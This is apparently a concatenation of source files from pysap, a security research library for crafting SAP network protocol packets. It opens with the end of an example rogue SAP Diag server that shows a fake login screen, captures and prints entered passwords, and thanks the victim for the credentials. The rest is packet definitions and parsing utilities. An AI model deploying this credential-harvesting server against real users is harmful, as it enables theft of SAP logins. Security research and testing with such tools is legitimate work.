                                                          SAPDiagDyntAtomItem(field2_text='@\\QUp to 40 Chars (Case-Sens.)@Password             ', field2_maxnrchars=52, row=3, dlg_flag_2=3, dlg_flag_1=4, atom_length=71, etype=132, attr_DIAG_BSD_PROTECTED=1L, field2_mlen=18, field2_dlen=52, attr_DIAG_BSD_PROPFONT=1L, block=1, col=1),
                                                          SAPDiagDyntAtomItem(row=3, dlg_flag_2=3, dlg_flag_1=4, atom_length=24, name_text='RSYST-BCODE', etype=114, attr_DIAG_BSD_PROTECTED=1L, attr_DIAG_BSD_PROPFONT=1L, block=1, col=1),
                                                          SAPDiagDyntAtomItem(field2_text='?                                       ', attr_DIAG_BSD_YES3D=1L, field2_maxnrchars=40, row=3, dlg_flag_2=1, dlg_flag_1=4, atom_length=59, etype=130, attr_DIAG_BSD_INVISIBLE=1L, field2_mlen=12, field2_dlen=40, block=1, col=20),
                                                          SAPDiagDyntAtomItem(attr_DIAG_BSD_YES3D=1L, row=3, dlg_flag_2=1, dlg_flag_1=4, atom_length=24, name_text='RSYST-BCODE', etype=114, attr_DIAG_BSD_INVISIBLE=1L, block=1, col=20),
                                                          SAPDiagDyntAtomItem(attr_DIAG_BSD_YES3D=1L, row=3, dlg_flag_2=1, dlg_flag_1=4, atom_length=86, xmlprop_text='<Propertybag><DefaultTooltip>User password</DefaultTooltip></Propertybag>', etype=120, attr_DIAG_BSD_INVISIBLE=1L, block=1, col=20),
                                                          SAPDiagDyntAtomItem(field2_text='Language          ', field2_maxnrchars=18, row=5, dlg_flag_2=2, atom_length=37, etype=132, attr_DIAG_BSD_PROTECTED=1L, field2_mlen=18, field2_dlen=18, attr_DIAG_BSD_PROPFONT=1L, block=1, col=1),
                                                          SAPDiagDyntAtomItem(row=5, dlg_flag_2=2, atom_length=24, name_text='RSYST-LANGU', etype=114, attr_DIAG_BSD_PROTECTED=1L, attr_DIAG_BSD_PROPFONT=1L, block=1, col=1),
                                                          SAPDiagDyntAtomItem(field2_text='  ', attr_DIAG_BSD_YES3D=1L, field2_maxnrchars=2, row=5, atom_length=21, etype=130, field2_mlen=2, field2_dlen=2, block=1, col=20),
                                                          SAPDiagDyntAtomItem(attr_DIAG_BSD_YES3D=1L, row=5, atom_length=24, name_text='RSYST-LANGU', etype=114, block=1, col=20),
                                                          SAPDiagDyntAtomItem(atom_length=81, attr_DIAG_BSD_YES3D=1L, xmlprop_text='<Propertybag><DefaultTooltip>Language</DefaultTooltip></Propertybag>', etype=120, col=20, block=1, row=5),
                                                          SAPDiagDyntAtomItem(field2_text=self.session_title, field2_maxnrchars=18, row=7, dlg_flag_2=2, atom_length=37, etype=132, attr_DIAG_BSD_PROTECTED=1L, field2_mlen=18, field2_dlen=18, attr_DIAG_BSD_PROPFONT=1L, block=1, col=1),
                                                          ]), item_type=18, item_id=9, item_sid=2),
        ]

    def make_error_screen(self, message):
        return [SAPDiagItem(item_value=support_data_sapnw_702, item_type=16, item_id=6, item_sid=17),
                SAPDiagItem(item_value='808D17E1E8DBF1D0B43C000C297D2E11', item_type=16, item_id=6, item_sid=33),
                SAPDiagItem(item_value='\x01\x80\x8d\x17\xe1\xe8\xdb\xf1\xd2\xb4<\x00\x0c)}.\x11\x01', item_type=16, item_id=6, item_sid=31),
                SAPDiagItem(item_value=self.sid, item_type=16, item_id=6, item_sid=2),
                SAPDiagItem(item_value=self.client, item_type=16, item_id=6, item_sid=12),
                SAPDiagItem(item_value=self.hostname, item_type=16, item_id=6, item_sid=33),
                SAPDiagItem(item_value='TRADESHOW\x00', item_type=16, item_id=6, item_sid=37),
                SAPDiagItem(item_value='702\x007200\x0070\x00', item_type=16, item_id=6, item_sid=41),
                SAPDiagItem(item_value='SAP R/3 (1) %s     ' % self.sid, item_type=16, item_id=12, item_sid=10),
                SAPDiagItem(item_value='SAPMSYST                                ', item_type=16, item_id=6, item_sid=15),
                SAPDiagItem(item_value='0020                ', item_type=16, item_id=6, item_sid=16),
                SAPDiagItem(item_value='SAPMSYST                                ', item_type=16, item_id=6, item_sid=13),
                SAPDiagItem(item_value='0020', item_type=16, item_id=6, item_sid=14),
                SAPDiagItem(item_value=self.session_title, item_type=16, item_id=12, item_sid=9),
                SAPDiagItem(item_value=message, item_type=16, item_id=6, item_sid=11),
                ]

    def logoff(self):
        print "[*] Logging off the client %s" % str(self.client_address)
        try:
            self.request.send(SAPDiag(com_flag_TERM_EOP=1, com_flag_TERM_EOC=1, compress=0))
            self.request.close()
        except error:
            pass
        del(self.server.clients[self.client_address])

    def handle_data(self):
        if self.client_address in self.server.clients and self.server.clients[self.client_address].init:
            print "[*] Already initialized client %s" % str(self.client_address)
            self.handle_msg()
        else:
            print "[*] Uninitialized client %s" % str(self.client_address)
            self.handle_init()

    def handle_init(self):
        # For initialization we need to decode the packet as SAPDiagDP
        self.packet.decode_payload_as(SAPDiagDP)
        if SAPDiagDP in self.packet:
            self.server.clients[self.client_address].init = True
            self.server.clients[self.client_address].terminal = self.packet[SAPDiagDP].terminal
            print "[*] Client %s set to initialized (terminal: %s)" % (str(self.client_address),
                                                                       self.server.clients[self.client_address].terminal)
            self.request.send(SAPDiag(compress=0, message=self.make_login_screen()))
        else:
            print "[-] Error during initialization of client %s" % str(self.client_address)
            self.logoff()

    def handle_msg(self):
        print "[*] Received message from client %s" % str(self.client_address)
        diag = self.packet[SAPDiag]

        # Handle exit transaction (OK CODE = /i)
        if len(diag.get_item("APPL", "VARINFO", "OKCODE")) > 0 and diag.get_item("APPL", "VARINFO", "OKCODE")[0].item_value == "/i":
            print "[*] Windows closed by the client %s" % str(self.client_address)
            self.logoff()

        # Handle events (UI EVENT SOURCE)
        elif len(diag.get_item("APPL", "UI_EVENT", "UI_EVENT_SOURCE")) > 0:
            print "[*] UI Event sent by the client %s" % str(self.client_address)
            ui_event_source = diag.get_item("APPL", "UI_EVENT", "UI_EVENT_SOURCE")[0].item_value

            # Handle function key
            if ui_event_source.valid_functionkey_data:
                # Handle logoff event
                if ui_event_source.event_type == 7 and ui_event_source.control_type == 10 and ui_event_source.event_data == 15:
                    print "[*] Logoff sent by the client %s" % str(self.client_address)
                    self.logoff()

                # Handle enter event
                elif ui_event_source.event_type == 7 and ui_event_source.control_type == 10 and ui_event_source.event_data == 0:
                    print "[*] Enter sent by the client %s" % str(self.client_address)

            # Handle menu option
            elif ui_event_source.valid_menu_pos:
                print "[*] Menu event sent by the client %s" % str(self.client_address)

            else:
                print "[*] Other event sent by the client %s" % str(self.client_address)

        # Handle login request (DYNT Atom == \x00)
        atoms = diag.get_item(["APPL", "APPL4"], "DYNT", "DYNT_ATOM")
        if len(atoms) > 0:
            print "[*] Login request sent by the client %s" % str(self.client_address)
            # Print the Atom items information
            print "[*] Input fields:"
            for atom in [atom for atom_item in atoms for atom in atom_item.item_value.items]:
                if atom.etype in [121, 122, 123, 130, 131, 132]:
                    text = atom.field1_text or atom.field2_text
                    text = text.strip()
                    if atom.attr_DIAG_BSD_INVISIBLE and len(text) > 0:
                        # If the invisible flag was set, we're probably
                        # dealing with a password field
                        print "[*]\tPassword field:\t%s" % (text)
                    else:
                        print "[*]\tRegular field:\t%s" % (text)

            print "[*] Sending error message to client %s" % str(self.client_address)
            self.request.send(SAPDiag(compress=1, message=self.make_error_screen("Thanks for your credentials !!!")))

        # Otherwise we send an error message
        else:
            print "[*] Sending error message to client %s" % str(self.client_address)
            try:
                self.request.send(SAPDiag(compress=0, message=self.make_error_screen("E: Unable to process your request, try later")))
            except error:
                pass


class SAPDiagThreadedServer(SAPNIServerThreaded):
    clients_cls = SAPDiagClient


# Command line options parser
def parse_options():

    description = \
    """This example script implements a rogue server using the Diag protocol.
    It offers users a customizable login screen and gathers entered credentials.
    Tested with SAP Gui for Java 7.20 Patch Level 5 running on Ubuntu.
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options]"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    local = OptionGroup(parser, "Local")
    local.add_option("-b", "--local-host", dest="local_host", help="Local address [%default]", default="127.0.0.1")
    local.add_option("-l", "--local-port", dest="local_port", type="int", help="Local port [%default]", default=3200)
    parser.add_option_group(local)

    server = OptionGroup(parser, "Server")
    server.add_option("--sid", dest="server_sid", help="System ID", default="PRD")
    server.add_option("--client", dest="server_client", help="Default Client", default="001")
    server.add_option("--hostname", dest="server_hostname", help="Hostname", default="SAPNWPRD")
    server.add_option("--session-title", dest="server_session_title", help="Session Title", default="SAP Netweaver Demo Server")

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print "[*] Setting up the Diag server on %s:%d" % (options.local_host, options.local_port)
    server = SAPDiagThreadedServer((options.local_host, options.local_port),
                                   SAPDiagServerHandler,
                                   base_cls=SAPDiag)
    server.allow_reuse_address = True
    server.options = options
    print "[*] Waiting for clients ..."
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print "[*] Canceled by the user ..."
        server.shutdown()


if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# External imports
from scapy.layers.inet import TCP
from scapy.packet import Packet, bind_layers
from scapy.fields import (ByteField, ConditionalField, IPField, IntField,
                          StrFixedLenField)
# Custom imports
from pysap.SAPNI import SAPNI
from pysap.utils import (SignedShortField, ByteEnumKeysField,
                         StrFixedLenPaddedField)
from scapy.layers.inet6 import IP6Field


# RFC Request Type values
rfc_req_type_values = {
    0x00: "GW_UNDEF_TYPE",
    0x01: "CHECK_GATEWAY",
    0x02: "GW_CONNECT_GWWP",
    0x03: "GW_NORMAL_CLIENT",
    0x04: "GW_REMOTE_GATEWAY",
    0x05: "STOP_GATEWAY",
    0x06: "GW_LOCAL_R3",
    0x07: "GW_SEND_INTERNAL_ERROR",  # Requires NiLocalCheck
    0x08: "GW_SEND_INFO",
    0x09: "GW_SEND_CMD",
    0x0a: "GW_WORKPROCESS_DIED",  # Requires NiLocalCheck
    0x0b: "GW_REGISTER_TP",
    0x0c: "GW_UNREGISTER_TP",
    0x0d: "GW_CONNECT_DISP",  # Requires NiLocalCheck
    0x0e: "GW_GET_NO_REGISTER_TP",
    0x0f: "GW_SAP_WP_CLIENT",  # Requires NiLocalCheck
    0x10: "GW_CANCEL_REGISTER_TP",
    0x11: "REMOTE_GATEWAY",
    0x12: "GW_CONTAINER_RECEIVED",
}
"""RFC Request Type values"""

# RFC Monitor Command values
rfc_monitor_cmd_values = {
    0x01: "NOOP",
    0x02: "DELETE_CONN",
    0x03: "CANCEL_CONN",
    0x04: "RST_SINGLE_ERR_CNT",
    0x05: "RST_ALL_ERR_CNT",
    0x06: "INCREASE_TRACE",
    0x07: "DECREASE_TRACE",
    0x08: "READ_SEC_INFO",
    0x09: "REFRESH_SEC_INFO",
    0x0a: "READ_GWSYS_TBL",
    0x0b: "READ_CONN_TBL",
    0x0c: "READ_PROC_TBL",
    0x0d: "READ_CONN_ATTR",
    0x0e: "READ_MEMORY",
    0x0f: "READ_REQ_BLK",
    0x10: "ACT_STATISTIC",
    0x11: "DEACT_STATISTIC",
    0x12: "READ_STATISTIC",
    0x13: "RESET_STATISTIC",
    0x14: "READ_PARAMETER",
    0x19: "DUMP_NIBUFFER",
    0x20: "RESET_NIBUFFER",
    0x21: "ACT_EXTPGM_TRACE",
    0x22: "DEACT_EXTPGM_TRACE",
    0x23: "ACT_CONN_TRACE",
    0x24: "DEACT_CONN_TRACE",
    0x25: "RESET_TRACE",
    0x26: "SUICIDE",
    0x27: "READ_SEC_INFO2",
    0x28: "CANCEL_REG_TP",
    0x29: "DUMP",
    0x2a: "READ_GWSYS_TBL2",
    0x2b: "CHANGE_PARAMETER",
    0x2c: "GET_CONN_PARTNER",
    0x2d: "DELETE_CLIENT",
    0x2e: "DELETE_REMGW",
    0x2f: "DISCONNECT",
    0x30: "ENABLE_RESTART",
    0x31: "DISABLE_RESTART",
    0x32: "NI_TRACE",
    0x33: "CLI_INFO",
    0x34: "GW_INFO",
    0x35: "CONVID_INFO",
    0x36: "GET_NO_REG_TP",
    0x37: "CV_INFO",
    0x38: "SO_KEEPALIVE",
    0x39: "READ_CONN_TBL2",
    0x40: "READ_GWSYS_TBL3",
    0x41: "RELOAD_ACL",
}
"""RFC Monitor Command values"""


# APPC Header versions length:
# 1: 4Ch
# 2/3: 64h
# 4: 8Ah
# 5: 4Eh
# 6: 50h

class SAPRFC(Packet):
    """SAP Remote Function Call packet

    This packet is used for the Remote Function Call (RFC) protocol.
    """
    name = "SAP Remote Function Call"
    fields_desc = [
        ByteField("version", 3),  # If the version is 3, the packet has a size > 88h, versions 1 and 2 are 40h
        ByteEnumKeysField("req_type", 0, rfc_req_type_values),

        # Normal client fields (GW_NORMAL_CLIENT)
        ConditionalField(IPField("address", "0.0.0.0"), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(IntField("padd1", 0), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(StrFixedLenPaddedField("service", "", length=10), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(StrFixedLenField("codepage", "1100", length=4), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(StrFixedLenField("padd2", "\x00" * 6, length=6), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(StrFixedLenPaddedField("lu", "", length=8), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(StrFixedLenPaddedField("tp", "", length=8), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(StrFixedLenPaddedField("conversation_id", "", length=8), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(ByteField("appc_header_version", 6), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(ByteField("accept_info", 0xcb), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(SignedShortField("idx", -1), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(IP6Field("address6", "::"), lambda pkt:pkt.req_type == 0x03 and pkt.version == 3),

        ConditionalField(IntField("rc", 0), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(ByteField("echo_data", 0), lambda pkt:pkt.req_type == 0x03),
        ConditionalField(ByteField("filler", 0), lambda pkt:pkt.req_type == 0x03),

        # Monitor Command fields (GW_SEND_CMD)
        ConditionalField(ByteEnumKeysField("cmd", 0, rfc_monitor_cmd_values), lambda pkt:pkt.req_type == 0x09),
    ]


# Bind SAP NI with the RFC port
bind_layers(TCP, SAPNI, dport=3300)



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# External imports
import struct
import logging
from scapy.layers.inet import TCP
from scapy.packet import bind_layers
from scapy.fields import (IntField, IntEnumField, PacketListField,
                          StrFixedLenField, ConditionalField, ByteField,
                          FieldLenField, LenField, StrNullField)
# Custom imports
from pysap.SAPNI import SAPNI, SAPNIStreamSocket
from pysap.utils import ByteEnumKeysField, PacketNoPadded, StrNullFixedLenField


# Create a logger for the SAEnqueue layer
log_sapenqueue = logging.getLogger("pysap.sapenqueue")


# Enqueue Server Type values
enqueue_type_values = {
    0x00: "SYNC_REQUEST",
    0x01: "ASYNC_REQUEST",
    0x02: "RESPONSE",
}
"""Enqueue Server Type values"""


# Enqueue Server Destination values
enqueue_dest_values = {
    0x01: "SYNC_ENQUEUE",
    0x02: "ASYNC_ENQUEUE",
    0x03: "SERVER_ADMIN",
    0x05: "STAT_QUERY",
    0x06: "CONECTION_ADMIN",
    0x07: "ENQ_TO_REP",
    0x08: "REP_TO_ENQ",
}
"""Enqueue Server Destination values"""


# Enqueue Server Admin Opcode values
enqueue_server_admin_opcode_values = {
    0x01: "EnAdmDummyRequest",
    0x02: "EnAdmShutdownRequest",
    0x04: "EnAdmGetReplInfoRequest",
    0x06: "EnAdmTraceRequest",
}
"""Enqueue Server Admin Opcode values"""


# Enqueue Server Admin Trace Action values
enqueue_server_admin_trace_action_values = {
    0x01: "Raise level",
    0x02: "Lower level",
    0x03: "Get trace state",
    0x04: "Set trace status",
    0x05: "Reset trace files",
}
"""Enqueue Server Admin Trace Action values"""


# Enqueue Server Admin Trace Limit values
enqueue_server_admin_trace_limit_values = {
    0x00: "Globally",
    0x01: "Only in enserver",
    0x02: "Only in repserver",
    0x03: "Only in threads of type",
    0x04: "Only in one thread of type",
}
"""Enqueue Server Admin Trace Limit values"""


# Enqueue Server Admin Trace Thread values
enqueue_server_admin_trace_thread_values = {
    0x00: "All threads",
    0x01: "All I/O threads",
    0x02: "Enqueue Worker thread",
    0x03: "Replication thread",
    0x04: "ADM thread",
    0x05: "Signal thread",
    0x06: "Listener thread",
}
"""Enqueue Server Admin Trace Thread values"""


# Enqueue Server Connection Admin Opcode values
enqueue_conn_admin_opcode_values = {
    0x00: "Loopback packet",
    0x01: "Parameter Request",
    0x02: "Parameter Response",
    0x03: "Shutdown Read",
    0x04: "Shutdown Write",
    0x05: "Shutdown Both",
    0x06: "Keepalive",
}
"""Enqueue Server Opcode values"""


# Enqueue Server Connection Admin Parameter values
enqueue_param_values = {
    0x00: "ENCPARAM_RECV_LEN",
    0x01: "ENCPARAM_SEND_LEN",
    0x02: "ENCPARAM_MSG_TYPE",
    0x03: "ENCPARAM_SET_NAME",
    0x04: "ENCPARAM_SET_NOSUPP",
    0x05: "ENCPARAM_SET_VERSION",
    0x06: "ENCPARAM_SET_UCSUPPORT",
}
"""Enqueue Server Connection Admin Parameter values"""


class SAPEnqueueTracePattern(PacketNoPadded):
    """SAP Enqueue Server Admin Trace Pattern
    """
    name = "SAP Enqueue Server Admin Trace Pattern"
    fields_desc = [
        FieldLenField("len", None, length_of="pattern", fmt="B"),
        StrNullFixedLenField("pattern", "", length_from=lambda pkt:pkt.len, max_length=0xff),
    ]


class SAPEnqueueParam(PacketNoPadded):
    """SAP Enqueue Server Connection Admin Parameter packet
    """
    name = "SAP Enqueue Connection Admin Parameter"
    fields_desc = [
        IntEnumField("param", 0, enqueue_param_values),
        ConditionalField(IntField("len", 0), lambda pkt:pkt.param in [0x06]),
        ConditionalField(IntField("value", 0), lambda pkt:pkt.param not in [0x03, 0x04]),
        ConditionalField(StrNullField("set_name", ""), lambda pkt:pkt.param in [0x03]),
    ]


class SAPEnqueue(PacketNoPadded):
    """SAP Enqueue Server packet

    This packet is used for general Enqueue packets.
    """

    name = "SAP Enqueue"
    fields_desc = [
        StrFixedLenField("magic_bytes", "\xab\xcd\xe1\x23", 4),
        IntField("id", 0),
        LenField("len", None, fmt="!I"),
        LenField("len_frag", None, fmt="!I"),
        ByteEnumKeysField("dest", 0x00, enqueue_dest_values),
        ByteEnumKeysField("opcode", 0x00, enqueue_conn_admin_opcode_values),
        ByteField("more_frags", 0),
        ByteEnumKeysField("type", 0x00, enqueue_type_values),

        # Server Admin fields
        ConditionalField(StrNullFixedLenField("adm_eyecatcher1", "ENC", 3), lambda pkt:pkt.dest == 3),
        ConditionalField(ByteField("adm_version", 1), lambda pkt:pkt.dest == 3),
        ConditionalField(ByteField("adm_padd1", 0), lambda pkt:pkt.dest == 3),
        ConditionalField(ByteField("adm_padd2", 0), lambda pkt:pkt.dest == 3),
        ConditionalField(ByteField("adm_padd3", 0), lambda pkt:pkt.dest == 3),
        ConditionalField(StrFixedLenField("adm_eyecatcher2", "#EAA", 4), lambda pkt:pkt.dest == 3),
        ConditionalField(ByteField("adm_1", 1), lambda pkt:pkt.dest == 3),
        ConditionalField(IntField("adm_len", 0), lambda pkt:pkt.dest == 3),
        ConditionalField(ByteEnumKeysField("adm_opcode", 0, enqueue_server_admin_opcode_values), lambda pkt:pkt.dest == 3),
        ConditionalField(ByteField("adm_flags", 0), lambda pkt:pkt.dest == 3),
        ConditionalField(IntField("adm_rc", 0), lambda pkt:pkt.dest == 3),
        ConditionalField(StrFixedLenField("adm_eyecatcher3", "#EAE", 4), lambda pkt:pkt.dest == 3),

        # Server Admin Trace fields
        ConditionalField(ByteField("adm_trace_protocol_version", 1), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(ByteEnumKeysField("adm_trace_action", 3, enqueue_server_admin_trace_action_values), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(ByteEnumKeysField("adm_trace_limit", 0, enqueue_server_admin_trace_limit_values), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(ByteEnumKeysField("adm_trace_thread", 0, enqueue_server_admin_trace_thread_values), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(IntField("adm_trace_unknown1", 0), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(IntField("adm_trace_level", 1), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(IntField("adm_trace_level1", 1), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(ByteField("adm_trace_logging", 0), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(IntField("adm_trace_max_file_size", 20 * 1024 * 1024), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(FieldLenField("adm_trace_nopatterns", 0, count_of="adm_trace_patterns", fmt="!I"), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(FieldLenField("adm_trace_nopatterns1", 0, count_of="adm_trace_patterns", fmt="!I"), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(IntField("adm_trace_unknown3", 37), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(StrFixedLenField("adm_trace_eyecatcher4", "#EAH", 4), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(PacketListField("adm_trace_patterns", None, SAPEnqueueTracePattern, count_from=lambda pkt:pkt.adm_trace_nopatterns), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),
        ConditionalField(StrFixedLenField("adm_trace_eyecatcher5", "#EAD", 4), lambda pkt:pkt.dest == 3 and pkt.adm_opcode in [0x06]),

        # Connection Admin fields
        ConditionalField(FieldLenField("params_count", None, count_of="params", fmt="!I"), lambda pkt:pkt.dest == 6 and pkt.opcode in [1, 2]),
        ConditionalField(PacketListField("params", None, SAPEnqueueParam, count_from=lambda pkt:pkt.params_count), lambda pkt:pkt.dest == 6 and pkt.opcode in [1, 2]),
    ]

    def post_build(self, pkt, pay):
        """Adjust the len and len_frags fields after the build of the whole
        packet. """
        l = struct.pack("!I", len(pkt) + len(pay))
        pkt = pkt[:8] + l + l + pkt[16:]
        return pkt + pay


class SAPEnqueueStreamSocket(SAPNIStreamSocket):
    """Stream socket implementation of the Enqueue Server protocol. It performs
    reassemble of received fragmented packets to ease use in upper layers.
    """
    # TODO: Add support for sending fragmented packets.
    # TODO: Add recv/send max length values as parameters.

    desc = "Enqueue Stream socket"

    def __init__(self, sock, keep_alive=True, base_cls=None):
        """Initialization defaults to SAPEnqueue as base class"""
        if base_cls is None:
            base_cls = SAPEnqueue
        SAPNIStreamSocket.__init__(self, sock, keep_alive=keep_alive, base_cls=base_cls)

    def recv(self):
        """Receive a packet at the Enqueue layer, performing reassemble of
        fragmented packets if necessary.

        @return: received L{SAPEnqueue} packet
        @rtype: L{SAPEnqueue}

        @raise socket.error: if the connection was close
        """
        # Receive the NI packet
        packet = SAPNIStreamSocket.recv(self)

        if SAPEnqueue in packet and packet[SAPEnqueue].more_frags:
            log_sapenqueue.debug("Received Enqueue fragmented packet")

            head = str(packet[SAPEnqueue])[:20]
            data = str(packet[SAPEnqueue])[20:]
            total_length = packet[SAPEnqueue].len - 20
            recvd_length = len(packet[SAPEnqueue]) - 20
            log_sapenqueue.debug("Received %d up to %d bytes", recvd_length, total_length)
            while (recvd_length < total_length and packet[SAPEnqueue].more_frags == 1):
                response = SAPNIStreamSocket.recv(self)[SAPEnqueue]
                data += str(response)[20:]
                recvd_length += len(response) - 20
                log_sapenqueue.debug("Received %d up to %d bytes", recvd_length, total_length)

            packet = SAPEnqueue(head + data)

        return packet


# Bind SAP NI with the SAP Enqueue port
bind_layers(TCP, SAPNI, dport=3200)



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
from optparse import OptionParser
# Custom imports
import pysap


# Command line options parser
def parse_options():

    description = \
    """This script can be used to parse support bits info  and generate
    required info for pysap/wireshark plugin. Input file can be obtained
    from SAP Gui traces (for example file 'sapguidll_01_0001.trc').
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog -i <input_file>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)
    parser.add_option("-i", "--input", dest="input_file", help="Input file")

    (options, _) = parser.parse_args()

    if not options.input_file:
        parser.error("Input file required")

    return options


# Main function
def main():
    options = parse_options()
    print("[*] Parsing input file", options.input_file)

    # Read and parse the data
    with open(options.input_file, 'r') as f:
        input_data = f.readlines()

    data = {}
    for line in input_data:
        support_bit = line.split(' ', 1)[1].split('(', 1)
        name, bit = support_bit[0], int(support_bit[1].split(')', 1)[0])
        data[bit] = name

    # Fill missing bits
    unknown_no = unused_no = 1
    for bit in range(0, max(data.keys()) + 1):
        if bit in data:
            name = data[bit].replace(' ', '_')
            if name == "UNUSED":
                name = "UNUSED_%d" % unused_no
                unused_no += 1

            unknown = False
        else:
            name = "UNKNOWN_%d" % unknown_no
            unknown_no += 1
            unknown = True

        data[bit] = name, unknown

    pysap = wireshark_define = wireshark_hf = wireshark_parse = wireshark_module = ''
    for bit in list(data.keys()):
        name, unknown = data[bit]
        notice = " (Unknown support bit)" if unknown else ''

        if (bit % 8) == 0 and bit != 0:
            pysap += '\n'
            wireshark_define += '\n'
            wireshark_parse += 'offset+=1;\n'
            wireshark_module += '\n'

        pysap += 'BitField("%s", 0, 1),\t# %d%s\n' % (name, bit, notice)

        bitt = 1 << bit % 8
        wireshark_define += '#define SAPDIAG_SUPPORT_BIT_%s\t0x%02x // %d%s\n' % (name, bitt, bit, notice)

        wireshark_hf += 'static int hf_SAPDIAG_SUPPORT_BIT_%s = -1;\n' % name

        wireshark_parse += 'proto_tree_add_item(tree, hf_SAPDIAG_SUPPORT_BIT_%s, tvb, offset, 1, FALSE); // %d%s\n' % (name, bit, notice)

        wireshark_module += '{ &hf_SAPDIAG_SUPPORT_BIT_%s,\n\t{ "Support Bit %s", ' \
                            '"sapdiag.diag.supportbits.%s", FT_BOOLEAN, 8, NULL, ' \
                            'SAPDIAG_SUPPORT_BIT_%s, "SAP Diag Support Bit %s",\n\tHFILL }},\n' % (name, name, name, name, name)

    print("[*] pysap SAPDiagItems definition:")
    print(pysap)
    print("[*] wireshark plugin define:")
    print(wireshark_define)
    print("[*] wireshark plugin hf definitions:")
    print(wireshark_hf)
    print("[*] wireshark plugin parsing:")
    print(wireshark_parse)
    print("[*] wireshark plugin module:")
    print(wireshark_module)


if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
from random import randint
from socket import error as SocketError
from binascii import unhexlify as unhex
# Custom imports
from pysap.SAPRouter import SAPRoutedStreamSocket
from pysap.SAPDiag import SAPDiag, SAPDiagDP, SAPDiagItem
from pysap.SAPDiagItems import (user_connect_compressed,
                                user_connect_uncompressed,
                                support_data as default_support_data,
                                SAPDiagStep, SAPDiagSupportBits)


class SAPDiagConnection(object):
    """SAP Diag Connection

    This class represents a basic client connection to a Diag server.
    Handles initialization and further interaction by sending/receiving
    packets.
    """

    last_response = None
